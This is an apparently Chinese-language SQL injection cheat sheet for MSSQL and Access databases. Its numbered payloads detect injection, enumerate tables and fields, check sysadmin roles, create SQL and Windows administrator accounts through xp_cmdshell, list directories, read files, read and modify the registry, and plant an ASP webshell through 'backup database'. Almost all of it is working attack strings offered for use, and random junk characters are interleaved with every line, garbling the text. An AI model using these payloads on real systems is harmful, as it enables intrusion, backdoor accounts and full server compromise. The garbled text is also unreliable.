1.判断是否有注入;and 1=1 ;and 1=2 KzLkT7,y+
2.初步判断是否是mssql ;and user>0 #}C6}};
ME'LZ"VT
3.注入参数是字符'and [查询条件] and ''=' *30T$_PiX|
li%A?_/m<&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' t^g+nguz
\_t[\&.a}
5.判断数据库系统 -@mcu{&
G,,f' >
;and (select count(*) from sysobjects)>0 mssql d+&w7/F
4-W~1
;and (select count(*) from msysobjects)>0 access Ew&|!d
@eN,m {b
J?qikE&
!'kr:r}gg
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ;^ YpQP
]NY^0SqM
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %m "9 =C
r9~IR
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 UDHMNubB
0D}k ^W
9.(1)猜字段的ascii值(access) `6{4?v
VoNk.h"T
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 UX)QdT45Mh
L}>ts(!q&
(2)猜字段的ascii值(mssql) Q57Z~EsF
$A>]lLo0
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 z<8WN[fB
,UneS
10.测试权限结构(mssql) dSbz$Fct
[V41 Gk
pwo @
S"
8!7`F.BX
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /rv=mlpRL
c5t7X-LB
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >;~ia3
$K_-I8e|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- q(}#{OO
0#/Pc`zC
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cfPQcB>A
C.+:FY.H
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- mWH;-F*%
*NQsD C.J^
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /(Ryh6M
@0iXqM#jH
;and 1=(select IS_MEMBER('db_owner'));-- u(4o#m
V#V<Kz
r&nEM6
6o]>lQ}
11.添加mssql和系统的帐户 1|5TuljTd
N0UZ%,h\
;exec master.dbo.sp_addlogin username;-- IUQYoKz4}A
;exec master.dbo.sp_password null,username,password;-- ~uEI}z
Tnb5tHjnh
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- M/jdMfU
PAv<J<d
;exec master.dbo.xp_cmdshell 'net user username password H2E'i\
-<^3!C >
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kl#)0yqN0
oNRp
;exec master.dbo.xp_cmdshell 'net user username password /add';-- &p.7SPQ8/
)Z63 cr/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- els71t -
DcEGIaW
)4
'yI*
_6C,w`[[6
12.(1)遍历目录 T_~xDQ`v
CMHg]la
;create table dirs(paths varchar(100), id int) p\r V6+
W";Po)YC
;insert dirs exec master.dbo.xp_dirtree 'c:\' WRN}>]NgQ
GD#W=O
;and (select top 1 paths from dirs)>0 `qa>6`\
{0Ej*%
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) L$=a,$
ux>LciNq
TJkWL2r0c
[P%'p-Hg_
(2)遍历目录 910N1E
\$2zF8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #\MkbZc d
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 yeN(_t2.
&_$xMM,X
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 D?r% Y
$TavvO%#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 UUxP4
9,0}}3J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;Dc\[r
"IJcKoB
"S3U]zw0_
LH>h]OTQF
13.mssql中的存储过程 !24g_R[3"
WFMQ;
xp_regenumvalues 注册表根键, 子键 A]m_&A#
p&3~n:
Fo
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 bE2{^5iG
A9M/n^61
xp_regread 根键,子键,键值名 GlaZZ,
#oEq)Vq>g|
;exec xp_regread (eO_]<wmky
q4ej7T8
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 @{x+ln1r
;Yn_*M/*
xp_regwrite 根键,子键, 值名, 值类型, 值 EtA,ow
u|\K kk
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @1)C3(=A
7kQ,D,c'
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7dXh,sD
zM<yd#`yt8
xp_regdeletevalue 根键,子键,值名 ]d,#PF
( ALsc@K
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 d$v{oC}
+)*aS+
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 hV"2L4/E
dhI+_z
zK&J2P`
f9J]-#Iif
14.mssql的backup创建webshell u
%&4[zb
_<l9j;6
use model @wW)#!Mou
$q$\
create table cmd(str image); ;%xG bg!lg
2Jn?'76`
insert into cmd(str) values (''); a|@1RH>7H
LrnE6U9
backup database model to disk='c:\l.asp'; 8!Q0:4Vb
Dlo4Wy
?+y# t?
?XO}6q<tM
15.mssql内置函数 q'<K$4_,%
8^"P'XQ
;and (select @@version)>0 获得Windows的版本号 iuWw(dJk
<zF/at
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^HNccr
0vdnM8N2
;and (select user_name())>0 爆当前系统的连接用户 BG2Z'WOH
@!s(Zkpev
;and (select db_name())>0 得到当前连接的数据库 _@ @"'
KS(Ms*k;'
Zj2tQ}N
4L[-[{2
16.简洁的webshell 0+"P1/
_c6 zzGtH
use model C'CdVDmX
{$^Lb4O[V
create table cmd(str image); ?&r>`H E
vA,tW,
insert into cmd(str) values (''); RaY=~g
s h^&3}
backup database model to disk='g:\wwwtest\l.asp';